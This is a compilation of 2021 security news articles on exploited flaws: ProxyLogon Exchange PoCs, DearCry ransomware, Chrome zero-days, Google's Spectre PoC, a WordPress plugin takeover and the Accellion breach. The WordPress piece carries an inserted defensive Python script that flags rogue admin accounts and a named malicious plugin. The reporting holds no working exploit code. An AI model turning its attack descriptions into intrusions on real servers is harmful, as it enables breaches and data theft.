During the weekend, another security researcher published a new PoC exploit for the ProxyLogon vulnerabilities. The code is not ready to use and requires modification before it can compromise vulnerable Microsoft Exchange servers.
Will Dormann, a vulnerability researcher at the CERT/CC, confirmed the availability of the exploit and that it works.

He pointed out that there is no need to search for the exploit on the dark web or on cybercrime/hacking forums: a Google search is enough to find the exploit code.


A joint analysis conducted by Microsoft and RiskIQ identified more than 100,000 servers that were still vulnerable as of March 9.

“Based on telemetry from RiskIQ, we saw a total universe of nearly 400,000 Exchange servers on March 1. By March 9 there were a bit more than 100,000 servers still vulnerable. That number has been dropping steadily, with only about 82,000 left to be updated,” reads a post published by Microsoft last week. “We released one additional set of updates on March 11, and with this, we have released updates covering more than 95% of all versions exposed on the Internet.”

The public availability of PoC exploits and the large number of vulnerable Exchange servers exposed online pose serious risks for organizations.


Google fixes the third actively exploited Chrome 0-Day since January
15.3.2021
Exploit  Securityaffairs

Google has addressed a new zero-day flaw in its Chrome browser that has been actively exploited in the wild, the second one within a month
Google has fixed a new actively exploited zero-day in its Chrome browser, this is the second zero-day issue addressed by the IT giant within a month. The flaw, tracked as CVE-2021-21193, is a use after free vulnerability in the Blink rendering engine.

Google addressed the issue with the 89.0.4389.90 version for Windows, Mac, and Linux, which will be available in the coming days.

The flaw was reported to Google by an anonymous researcher on March 9. At the time of this writing the company has not revealed details about the vulnerability, to prevent other threat actors from exploiting the issue in the wild.

Google also addressed four other vulnerabilities.
"This update includes 5 security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the Chrome Security Page for more information," reads the post published by Google.

[$500][1167357] High CVE-2021-21191: Use after free in WebRTC. Reported by raven (@raid_akame) on 2021-01-15
[$TBD][1181387] High CVE-2021-21192: Heap buffer overflow in tab groups. Reported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability Research on 2021-02-23
[$TBD][1186287] High CVE-2021-21193: Use after free in Blink. Reported by Anonymous on 2021-03-09

"Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild."

Chrome Technical Program Manager Prudhvikumar Bommana added that Google has detected some of the bugs using AddressSanitizer, MemorySanitizer, UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL.

CVE-2021-21193 is the third actively exploited Chrome zero-day addressed since January.

In early February, Google addressed an actively exploited zero-day vulnerability, tracked as CVE-2021-21148, with the release of Chrome 88.0.4324.150. The vulnerability is a heap buffer overflow in V8, Google's open-source high-performance JavaScript and WebAssembly engine, written in C++.
Earlier this month, Google addressed another zero-day issue, tracked as CVE-2021-21166, that was actively exploited in the wild.

In 2020, Google addressed five Chrome zero-days actively exploited in the wild.

In October, the IT giant addressed the following three zero-days:

CVE-2020-15999 – a memory corruption bug in the FreeType font rendering library, which is included in standard Chrome releases.
CVE-2020-16009 – a heap buffer overflow in FreeType in Google Chrome.
CVE-2020-16010 – affects the browser’s user interface (UI) component in Chrome for Android.
In November, the company addressed two other zero-day vulnerabilities, actively exploited in the wild.

Both zero-day flaws, tracked as CVE-2020-16013 and CVE-2020-16017, were reported by anonymous sources.


Google Releases PoC Exploit for Browser-Based Spectre Attack
15.3.2021
Exploit  Securityweek

Google last week announced the release of proof-of-concept (PoC) code designed to exploit the notorious Spectre vulnerability and leak information from web browsers.

Initially detailed in early 2018 alongside Meltdown, the side-channel attack could allow a malicious application to access data being processed on the device. The vulnerability could expose passwords, documents, emails, data from instant messaging apps, and more.

Since the public disclosure of Meltdown and Spectre, both hardware makers and software developers alike have been working on devising protections against similar flaws, and browser makers too have been implementing application-level mitigations.

In 2019, the Google team responsible for Chrome’s V8 JavaScript engine said that the attack can’t be mitigated at the software level, arguing that security boundaries in browsers should be aligned with low-level primitives, such as process-based isolation.

To keep their users safe, browser makers have already implemented protections such as Site Isolation, Cross-Origin Read Blocking, and out-of-process iframes, with a variety of security features available for other application developers as well, including Cross-Origin Resource and Cross-Origin Opener Policies, and more.

The purpose of these mechanisms is to prevent sensitive data from being present in memory sections that an attacker could read. However, they do not prevent Spectre exploitation.

In order to assess the effectiveness of such mitigations, Google’s researchers have released JavaScript PoC code functional across multiple operating systems, architectures, and hardware variants, and which “confirms the practicality of Spectre exploits against JavaScript engines.”

While Chrome has been used to demonstrate the attack, the exploited issues are not specific to Google’s browser, but affect other modern browsers as well. An interactive demonstration of the attack can be accessed on this page, while the code and technical details were published on GitHub.

“The demonstration website can leak data at a speed of 1kB/s when running on Chrome 88 on an Intel Skylake CPU. Note that the code will likely require minor modifications to apply to other CPUs or browser versions; however, in our tests the attack was successful on several other processors, including the Apple M1 ARM CPU, without any major changes,” Google explains.

In addition to releasing the PoC, Google is making recommendations (Post-Spectre Web Development and Mitigating Side-Channel Attacks) on how web developers can improve site isolation to deny access to cross-origin resources, thus effectively mitigating Spectre-style hardware attacks, among others.

Such mitigations include Cross-Origin Resource Policy (CORP) and Fetch Metadata Request Headers, Cross-Origin Opener Policy (COOP), and Cross-Origin Embedder Policy (COEP), along with standard protections, such as the X-Frame-Options and X-Content-Type-Options headers, along with SameSite cookies.

“It's important to note that while […] the mechanisms […] are important and powerful security primitives, they don't guarantee complete protection against Spectre; they require a considered deployment approach which takes behaviors specific to the given application into account,” Google notes.


Google releases Spectre PoC code exploit for Chrome browser
14.3.2021
Exploit  Securityaffairs

Google released proof-of-concept code to conduct Spectre attacks against its Chrome browser to share knowledge of browser-based side-channel attacks.
Google released proof-of-concept code for conducting a Spectre attack against its Chrome browser on GitHub. The experts decided to publish the proof of concept code to demonstrate the feasibility of a web-based Spectre exploit.

The PoC code was written in JavaScript and works on Chrome 88 on an Intel Skylake CPU; it allows extracting data from device memory at a speed of 1kB/s.

“Today, we’re sharing proof-of-concept (PoC) code that confirms the practicality of Spectre exploits against JavaScript engines. We use Google Chrome to demonstrate our attack, but these issues are not specific to Chrome, and we expect that other modern browsers are similarly vulnerable to this exploitation vector.” reads the post published by Google. “We have developed an interactive demonstration of the attack available at https://leaky.page/; the code and a more detailed writeup are published on Github here.”

Google researchers speculate the PoC code works on other CPUs (different vendor and/or generation), operating systems and Chromium flavors.

Below is the description of the demo published on a site set up by Google to host the PoC code.

“This demo is split into three parts:

Calibrating the timer to observe side effects of the CPU’s speculative execution.
A demonstration that infers the memory layout of a JavaScript array.
The Spectre proof of concept itself, leaking memory of your browser’s renderer process.”
In January 2018, researchers disclosed two attacks dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be conducted to steal sensitive data processed by the CPU.

Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.

To protect systems from both Meltdown and Spectre attacks it is possible to implement the hardening technique known as kernel page table isolation (KPTI). The technique isolates kernel-space memory from user-space memory.

The PoC code released by Google allows recovering cached data from memory, including sensitive data such as encryption keys.

The released PoC code is easy to set up because it works without a high-precision timer such as SharedArrayBuffer.

“For the published PoC, we implemented a simple Variant 1 gadget: a JavaScript array is speculatively accessed out of bounds after training the branch predictor that the compiler-inserted length check will succeed.” continues Google. “This particular gadget can be mitigated at the software level; however, Chrome’s V8 team concluded that this is not the case for other gadgets: “we found that effective mitigation of some variants of Spectre, particularly variant 4, to be simply infeasible in software.” We invite the security community to extend our research and develop code that makes use of other Spectre gadgets.”
Google experts also developed other PoC exploits with different properties, but they did not release them. One of these PoCs leaks data at a rate of 8kB/s, but it is less stable because it uses the performance.now() API as a 5 μs (5,000 ns) precision timer. Another PoC uses a timer of 1ms or worse and leaks data at a rate of only 60B/s.
Google recommends that developers use new security mechanisms to protect against Spectre hardware attacks and common web-level cross-site leaks.

Standard protections include the X-Content-Type-Options and X-Frame-Options headers and the use of SameSite cookies, but researchers also recommend enabling the following protections:

Cross-Origin Resource Policy (CORP) and Fetch Metadata Request Headers allow developers to control which sites can embed their resources, such as images or scripts, preventing data from being delivered to an attacker-controlled browser renderer process. See resourcepolicy.fyi and web.dev/fetch-metadata.
Cross-Origin Opener Policy (COOP) lets developers ensure that their application window will not receive unexpected interactions from other websites, allowing the browser to isolate it in its own process. This adds an important process-level protection, particularly in browsers which don’t enable full Site Isolation; see web.dev/coop-coep.
Cross-Origin Embedder Policy (COEP) ensures that any authenticated resources requested by the application have explicitly opted in to being loaded. Today, to guarantee process-level isolation for highly sensitive applications in Chrome or Firefox, applications must enable both COEP and COOP; see web.dev/coop-coep.
The Google Security Team released a prototype Chrome extension named Spectroscope that allows web developers to protect their websites from Spectre.


Microsoft Exchange Exploits Pave a Ransomware Path

13.3.2021 Exploit  Threatpost

As attacks double every hour, hackers are exploiting vulnerable Microsoft Exchange servers and installing a new family of ransomware called DearCry.

Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.

The ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft issued emergency patches in early March for four Microsoft Exchange flaws. The flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit – meaning that attackers can take over servers without knowing any valid account credentials.

The flaws give attackers the opportunity to install a webshell for further exploitation within the environment — and now, researchers say attackers are downloading the new ransomware strain (a.k.a. Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.

“We have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,” Microsoft said on Twitter, Thursday.

DearCry Ransomware
DearCry first came onto the infosec space’s radar after ransomware expert Michael Gillespie on Thursday said he observed a “sudden swarm” of submissions to his ransomware identification website, ID-Ransomware.

The ransomware uses the extension “.CRYPT” when encrypting files, as well as a filemarker “DEARCRY!” in the string for each encrypted file.

Microsoft later confirmed that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.

According to a report by BleepingComputer, the ransomware drops a ransom note (called ‘readme.txt’) after initially infecting the victim – which contains two email addresses for the threat actors and demands a ransom payment of $16,000.

Meanwhile, MalwareHunterTeam on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. On Twitter, MalwareHunterTeam said the ransomware is “not that very widespread (yet?).” Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which can be found here).

Microsoft Exchange Attacks Doubling Every Hour
Exploitation activity for the recently patched Exchange flaws continues to skyrocket, with researchers this week warning the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.

New research by Check Point Software said that in the past 24 hours alone, the number of exploitation attempts against organizations has doubled every two to three hours.

Researchers said they saw hundreds of exploit attempts against organizations worldwide – with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).

Researchers warned that exploitation activity will continue — and urged companies that have not already done so to patch.

“Since the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,” according to Check Point researchers. “Global experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.”


WSJ: Microsoft Probing Possible PoC Exploit Code Leak
13.3.2021
Exploit  Securityweek

Software giant Microsoft Corp. has launched an investigation to determine whether one of its flagship information-sharing programs sprung a leak that led to the widespread exploitation of Exchange server deployments around the world.

According to a bombshell report in the Wall Street Journal, Redmond is looking closely at its Microsoft Active Protections Program (MAPP) to figure out if an anti-malware partner in China leaked proof-of-concept code ahead of the availability of security updates.

The MAPP program lets Microsoft share vulnerability data to give anti-malware, intrusion prevention/detection and corporate network security vendors a head-start to add signatures and filters to protect against Microsoft software vulnerabilities.

The program is popular with defenders, but it has long been controversial because there is a legitimate risk that data on serious, unpatched vulnerabilities could land in the wrong hands.

In 2012, Microsoft dropped a Chinese vendor from the program after violations and there is rampant speculation that something similar happened in late February this year ahead of the Exchange Server patches.

The WSJ says Microsoft’s new investigation centers on the question of how a stealthy attack that began in early January picked up steam in the week before the company was able to send a software fix to customers.

From the WSJ article:

Some of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to “proof-of-concept” attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say. Microsoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.

One focus of the investigation has been an information-sharing program called the Microsoft Active Protections Program, which was created in 2008 to give security companies a head start in detecting emerging threats. Mapp includes about 80 security companies world-wide, about 10 of which are based in China. A subset of the Mapp partners were sent the Feb. 23 Microsoft notification, which included the proof-of-concept code, according to sources familiar with the program.

The report said Microsoft declined to say whether any Chinese companies were included in this release.

Microsoft’s probe comes amidst news that ransomware gangs are starting to take aim at the Exchange Server vulnerabilities, adding a new sense of urgency to the need for organizations to apply patches and remove backdoors from their networks.


Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild
13.3.2021
Exploit  Thehackernews

Google has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month.

The browser maker on Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users.

While the update contains a total of five security fixes, the most important flaw rectified by Google concerns a use after free vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193.

Details about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9.

As is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users have installed the fixes, so as to prevent other threat actors from creating exploits targeting this zero-day.

"Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild," Chrome Technical Program Manager Prudhvikumar Bommana noted in a blog post.

With this update, Google has fixed three zero-day flaws in Chrome since the start of the year.

Earlier this month, the company issued a fix for an "object lifecycle issue in audio" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.

Chrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.


Expert publishes PoC exploit code for Microsoft Exchange flaws
12.3.2021
Exploit  Securityaffairs

This week a security researcher published on GitHub a proof-of-concept tool to hack Microsoft Exchange servers by chaining two of the ProxyLogon flaws.
On March 2nd, Microsoft released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.

The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments. According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations.

This week, the independent security researcher Nguyen Jang published on GitHub a proof-of-concept tool to hack Microsoft Exchange servers. The tool chains two of the ProxyLogon vulnerabilities recently addressed by Microsoft.
The availability of the proof-of-concept code was first reported by The Record.

“A Vietnamese security researcher has published today the first functional public proof-of-concept exploit for a group of vulnerabilities in Microsoft Exchange servers known as ProxyLogon, and which have been under heavy exploitation for the past week.” reads the post published by The Record. “The proof-of-concept code was published on GitHub earlier today. A technical write-up (in Vietnamese) is also available on blogging platform Medium.”

The availability of the exploit online was immediately noticed by several cyber security experts, including Marcus Hutchins.

A few hours after the publication, GitHub took down the PoC hacking tool because it posed a threat to Microsoft’s customers using the Microsoft Exchange solution.

“We understand that the publication and distribution of proof of concept exploit code has educational and research value to the security community, and our goal is to balance that benefit with keeping the broader ecosystem safe,” the spokesperson said in an email sent to Vice. “In accordance with our Acceptable Use Policies, we disabled the gist following reports that it contains proof of concept code for a recently disclosed vulnerability that is being actively exploited.”

Jang explained that he published the PoC code to raise the alert on the recent wave of hacks and to give colleagues the opportunity to study the code used in the attacks.
Experts at Praetorian published a detailed technical analysis of the exploit for the Microsoft Exchange flaws: they reverse-engineered the CVE-2021-26855 patch and developed a fully functioning end-to-end exploit.
Also in this case, experts warn that the technical analysis shared by the researchers could further speed up the development of a working exploit.


Hackers stole data from Norway parliament exploiting Microsoft Exchange flaws
12.3.2021
Exploit  Securityaffairs

Norway's parliament, the Storting, has suffered a new cyberattack; hackers stole data by exploiting recently disclosed Microsoft Exchange vulnerabilities.
Norway's parliament, the Storting, was hit by a new cyberattack in which threat actors stole data by exploiting the recently disclosed vulnerabilities in Microsoft Exchange, collectively tracked as ProxyLogon.

On March 2nd, Microsoft released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.

The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments. According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations.

“The Storting has again been hit by an IT attack. The attack is linked to vulnerabilities in Microsoft Exchange, which affected several businesses.” reads a statement issued by the Storting.

“The Storting does not yet know the full extent of the attack. A number of measures have been implemented in our systems, and the analysis work is ongoing. The Storting has received confirmation that data has been extracted.”

Storting director Marianne Andreassen confirmed the data breach.

“We know that data has been extracted, but we do not yet have a full overview of the situation. We have implemented comprehensive measures and cannot rule out that it will be implemented further.” said Andreassen.

“The work takes place in collaboration with the security authorities. The situation is currently unclear, and we do not know the full potential for damage.”

This isn’t the first time the Storting has been hit by a cyber attack: in August 2020 the authorities announced that Norway's Parliament was the target of a major attack that allowed hackers to access emails and data of a small number of parliamentary representatives and employees. Norway's government blamed Russia for that cyberattack.

At the time of this writing, it is not possible to attribute the recent attack to a specific threat actor. Security experts have observed that Hafnium wasn’t the only APT group exploiting the Microsoft Exchange vulnerabilities in its attacks.

ESET researchers pointed out that other threat actors, such as Tick, LuckyMouse, and Calypso, had also been exploiting the ProxyLogon flaws before Microsoft addressed them.


ProxyLogon PoC Exploit Released; Likely to Fuel More Disruptive Cyber Attacks
12.3.2021
Exploit  Thehackernews

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on Wednesday issued a joint advisory warning of active exploitation of vulnerabilities in Microsoft Exchange on-premises products by nation-state actors and cybercriminals.

"CISA and FBI assess that adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack," the agencies said. "Adversaries may also sell access to compromised networks on the dark web."

The attacks have primarily targeted local governments, academic institutions, non-governmental organizations, and business entities in various industry sectors, including agriculture, biotechnology, aerospace, defense, legal services, power utilities, and pharmaceutical, which the agencies say are in line with previous activity conducted by Chinese cyber actors.

Tens of thousands of entities, including the European Banking Authority and the Norwegian Parliament, are believed to have been breached to install a web-based backdoor called the China Chopper web shell that grants the attackers the ability to plunder email inboxes and remotely access the target systems.

The development comes in light of the rapid expansion of attacks aimed at vulnerable Exchange Servers, with multiple threat actors exploiting the vulnerabilities as early as February 27 before they were eventually patched by Microsoft last week, swiftly turning what was labeled as "limited and targeted" into an indiscriminate mass exploitation campaign.

While there is no concrete explanation for the widespread exploitation by so many different groups, speculations are that the adversaries shared or sold exploit code, resulting in other groups being able to abuse these vulnerabilities, or that the groups obtained the exploit from a common seller.

From RCE to Web Shells to Implants
On March 2, 2021, Volexity publicly disclosed the detection of multiple zero-day exploits used to target flaws in on-premises versions of Microsoft Exchange Servers, while pegging the earliest in-the-wild exploitation activity on January 3, 2021.

Successful weaponization of these flaws, called ProxyLogon, allows an attacker to access victims' Exchange Servers, enabling them to gain persistent system access and control of an enterprise network.

Although Microsoft initially pinned the intrusions on Hafnium, a threat group that's assessed to be state-sponsored and operating out of China, Slovakian cybersecurity firm ESET on Wednesday said it identified no fewer than 10 different threat actors that likely took advantage of the remote code execution flaws to install malicious implants on victims' email servers.

Apart from Hafnium, the five groups detected as exploiting the vulnerabilities prior to the patch release are Tick, LuckyMouse, Calypso, Websiic, and Winnti (aka APT41 or Barium), with five others (Tonto Team, ShadowPad, "Opera" Cobalt Strike, Mikroceen, and DLTMiner) scanning and compromising Exchange servers in the days immediately following the release of the fixes.

No conclusive evidence has emerged so far connecting the campaign to China, but Domain Tools' Senior Security Researcher Joe Slowik noted that several of the aforementioned groups have been formerly linked to China-sponsored activity, including Tick, LuckyMouse, Calypso, Tonto Team, Mikroceen, and the Winnti Group, indicating that Chinese entities other than Hafnium are tied to the Exchange exploitation activity.

"It seems clear that there are numerous clusters of groups leveraging these vulnerabilities, the groups are using mass scanning or services that allow them to independently target the same systems, and finally there are multiple variations of the code being dropped, which may be indicative of iterations to the attack," Palo Alto Networks' Unit 42 threat intelligence team said.

In one cluster tracked as "Sapphire Pigeon" by researchers from U.S.-based Red Canary, attackers dropped multiple web shells on some victims at different times, some of which were deployed days before they conducted follow-on activity.

According to ESET's telemetry analysis, more than 5,000 email servers belonging to businesses and governments from over 115 countries are said to have been affected by malicious activity related to the incident. For its part, the Dutch Institute for Vulnerability Disclosure (DIVD) reported Tuesday that it found 46,000 servers out of 260,000 globally that were unpatched against the heavily exploited ProxyLogon vulnerabilities.

Troublingly, evidence points to the fact that the deployment of the web shells ramped up following the availability of the patch on March 2, raising the possibility that additional entities have opportunistically jumped in to create exploits by reverse engineering Microsoft updates as part of multiple, independent campaigns.

"The day after the release of the patches, we started to observe many more threat actors scanning and compromising Exchange servers en masse," said ESET researcher Matthieu Faou. "Interestingly, all of them are APT groups focused on espionage, except one outlier that seems related to a known coin-mining campaign (DLTminer). It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later."

Aside from installing the web shell, other behaviors related to or inspired by Hafnium activity include conducting reconnaissance in victim environments by deploying batch scripts that automate several functions such as account enumeration, credential-harvesting, and network discovery.

Public Proof-of-Concept Available
Complicating the situation further is the availability of what appears to be the first functional public proof-of-concept (PoC) exploit for the ProxyLogon flaws despite Microsoft's attempts to take down exploits published on GitHub over the past few days.

"I've confirmed there is a public PoC floating around for the full RCE exploit chain," security researcher Marcus Hutchins said. "It has a couple bugs but with some fixes I was able to get shell on my test box."

Also accompanying the PoC's release is a detailed technical write-up by Praetorian researchers, who reverse-engineered CVE-2021-26855 to build a fully functioning end-to-end exploit by identifying differences between the vulnerable and patched versions.

While the researchers deliberately decided to omit critical PoC components, the development has also raised concerns that the technical information could further accelerate the development of a working exploit, in turn triggering even more threat actors to launch their own attacks.

As the sprawling hack's timeline slowly crystallizes, what's clear is that the surge of breaches against Exchange Server appears to have happened in two phases, with Hafnium using the chain of vulnerabilities to stealthily attack targets in a limited fashion, before other hackers began driving the frenzied scanning activity starting February 27.

Cybersecurity journalist Brian Krebs attributed this to the prospect that "different cybercriminal groups somehow learned of Microsoft's plans to ship fixes for the Exchange flaws a week earlier than they'd hoped."

"The best advice to mitigate the vulnerabilities disclosed by Microsoft is to apply the relevant patches," Slowik said. "However, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities to counter existing intrusions."


Vulnerability That Allows Complete WordPress Site Takeover Exploited in the Wild
10.3.2021
Exploit  Securityweek

A critical vulnerability identified in The Plus Addons for Elementor WordPress plugin could be exploited to gain administrative privileges to a website. The zero-day has been exploited in the wild, the Wordfence team at WordPress security company Defiant warns.

With more than 30,000 installations to date, The Plus Addons for Elementor is a premium plugin that has been designed to add several widgets to be used with the popular WordPress website builder Elementor.

The identified issue, Wordfence explains, resides in one of the added widgets, which provides the ability to insert user login and registration forms to Elementor pages.

Because the functionality is not properly configured, an attacker can create a new administrative user account on the vulnerable site, or even log in as an existing administrative user, the researchers reveal.

All users of The Plus Addons for Elementor plugin are advised to deactivate and remove the plugin until a fix has been delivered for this zero-day. All registration or login widgets added by the plugin should be removed, and registration on vulnerable sites disabled.

The researchers also note that the free version of the plugin, namely The Plus Addons for Elementor Lite, is not affected by the same vulnerability. Thus, users should switch to the free version instead, until the vulnerability is addressed.

“It should be noted that this vulnerability can still be exploited even if you do not have an active login or registration page that was created with the plugin. This means that any site running this plugin is vulnerable to compromise,” Wordfence says.

The researchers also note that the vulnerability is currently being actively exploited. Thus, no further details on the issue are being released for the time being.

“We believe that attackers are adding user accounts with usernames as the registered email address based on how the vulnerability creates user accounts, and in some cases installing a malicious plugin labeled wpstaff. We strongly recommend checking your site for any unexpected administrative users or plugins you did not install,” Wordfence concludes.
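The two checks Wordfence recommends above, as an added example that is not part of the article or of Wordfence's tooling: it flags administrator accounts whose login is their e-mail address (the account-creation pattern described) and plugins the operator did not install, with the `wpstaff` name called out explicitly. The WP-CLI field layout it parses and every sample row are assumptions constructed for the example.

```python
"""Audit helper for the Wordfence guidance: suspicious admins and plugins.

Added example, not code from the article or from Wordfence. Sample rows are
constructed; the WP-CLI JSON layout it parses is an assumption (the fields
user_login, user_email, user_registered and a comma-separated roles string,
as produced by `wp user list --format=json --fields=...`).
"""
import json
from dataclasses import dataclass
from datetime import datetime


@dataclass
class WpUser:
    user_login: str
    user_email: str
    roles: tuple            # e.g. ("administrator",)
    user_registered: datetime


def from_wpcli_json(text):
    """Parse `wp user list --format=json` output (assumed layout) into WpUser rows."""
    rows = []
    for r in json.loads(text):
        roles = tuple(x.strip() for x in r.get("roles", "").split(",") if x.strip())
        registered = datetime.strptime(r["user_registered"], "%Y-%m-%d %H:%M:%S")
        rows.append(WpUser(r["user_login"], r["user_email"], roles, registered))
    return rows


# Constructed sample rows standing in for a dump of wp_users / wp_usermeta.
SAMPLE_USERS = [
    WpUser("siteowner", "owner@example.org", ("administrator",), datetime(2019, 5, 2)),
    WpUser("editor1", "ed@example.org", ("editor",), datetime(2020, 1, 14)),
    # The pattern the article describes: login equal to the registration e-mail.
    WpUser("mallory@evil.example", "mallory@evil.example", ("administrator",),
           datetime(2021, 3, 8, 10, 22)),
]

# Plugin directory names as found under wp-content/plugins (constructed).
SAMPLE_PLUGINS = ["elementor", "theplus_elementor_addon", "wpstaff"]

# Plugins the operator knows they installed (constructed allowlist).
KNOWN_PLUGINS = {"elementor", "theplus_elementor_addon"}


def suspicious_admins(users, since=None):
    """Return (login, reasons) for admins whose login is an e-mail address,
    or who were registered on/after `since` ("YYYY-MM-DD") when it is given."""
    cutoff = datetime.fromisoformat(since) if since else None
    findings = []
    for u in users:
        if "administrator" not in u.roles:
            continue
        reasons = []
        if "@" in u.user_login and u.user_login.lower() == u.user_email.lower():
            reasons.append("login equals e-mail address")
        if cutoff is not None and u.user_registered >= cutoff:
            reasons.append(f"registered on {u.user_registered:%Y-%m-%d}")
        if reasons:
            findings.append((u.user_login, reasons))
    return findings


def unexpected_plugins(installed, known, flagged=("wpstaff",)):
    """Plugins missing from the allowlist; names the article reports as
    malicious are reported even if someone added them to the allowlist."""
    return sorted(p for p in installed if p not in known or p in flagged)


if __name__ == "__main__":
    for login, why in suspicious_admins(SAMPLE_USERS, since="2021-03-01"):
        print(f"admin {login}: {', '.join(why)}")
    print("unexpected plugins:", unexpected_plugins(SAMPLE_PLUGINS, KNOWN_PLUGINS))
```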

The researchers have created a proof-of-concept and contacted the plugin’s developers, who are reportedly working on a patch.


Extortion Gang Breaches Cybersecurity Firm Qualys Using Accellion Exploit
5.3.2021
Exploit  Thehackernews

Enterprise cloud security firm Qualys has become the latest victim to join a long list of entities to have suffered a data breach after zero-day vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents.

As proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared screenshots of files belonging to the company's customers on a publicly accessible data leak website operated by the CLOP ransomware gang.

Confirming the incident, Qualys Chief Information Security Officer Ben Carr said a detailed probe "identified unauthorized access to files hosted on the Accellion FTA server" located in a DMZ (aka demilitarized zone) environment that's segregated from the rest of the internal network.

"Based on this investigation, we immediately notified the limited number of customers impacted by this unauthorized access," Carr added. "The investigation confirmed that the unauthorized access was limited to the FTA server and did not impact any services provided or access to customer data hosted by the Qualys Cloud Platform."

Last month, FireEye's Mandiant threat intelligence team disclosed details of four zero-day flaws in the FTA application that were exploited by threat actors to mount a wide-ranging data theft and extortion campaign, which involved deploying a web shell called DEWMODE on target networks to exfiltrate sensitive data, followed by sending extortion emails to threaten victims into paying bitcoin ransoms, failing which the stolen data was posted on the data leak site.

While two of the flaws (CVE-2021-27101 and CVE-2021-27104) were addressed by Accellion on December 20, 2020, the other two vulnerabilities (CVE-2021-27102 and CVE-2021-27103) were identified and fixed earlier this year on January 25.

Qualys said it received an "integrity alert" suggesting a possible compromise on December 24, two days after it applied the initial hotfix on December 22. The company didn't say if it received extortion messages in the wake of the breach, but said an investigation into the incident is ongoing.

"The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution," Mandiant said in a security assessment of the FTA software published earlier this week.

Additionally, Mandiant's source code analysis uncovered two more previously unknown security flaws in the FTA software, both of which have been rectified in a patch (version 9.12.444) released on March 1 —

* CVE-2021-27730: An argument injection vulnerability (CVSS score 6.6) accessible only to authenticated users with administrative privileges, and
* CVE-2021-27731: A stored cross-site scripting flaw (CVSS score 8.1) accessible only to regular authenticated users

The FireEye-owned subsidiary is tracking the exploitation activity and the follow-on extortion scheme under two separate threat clusters it calls UNC2546 and UNC2582, respectively, with overlaps identified between the two groups and previous attacks carried out by a financially motivated threat actor dubbed FIN11. But it is still unclear what connection, if any, the two clusters may have with the operators of Clop ransomware.


Google Patches Actively-Exploited Flaw in Chrome Browser

4.3.2021 Exploit  Threatpost

A flaw (CVE-2021-21166) in the Audio component of Google Chrome is fixed in a new update being pushed out to Windows, Mac and Linux users.

Google has fixed a high-severity vulnerability in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the flaw.

The vulnerability is one of 47 security fixes that the tech giant rolled out on Tuesday in Chrome 89.0.4389.72, including patches for eight high-severity flaws.

“The Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux,” according to Google on Tuesday. “This will roll out over the coming days/weeks.”

Google Chrome: Actively-Exploited Security Flaw
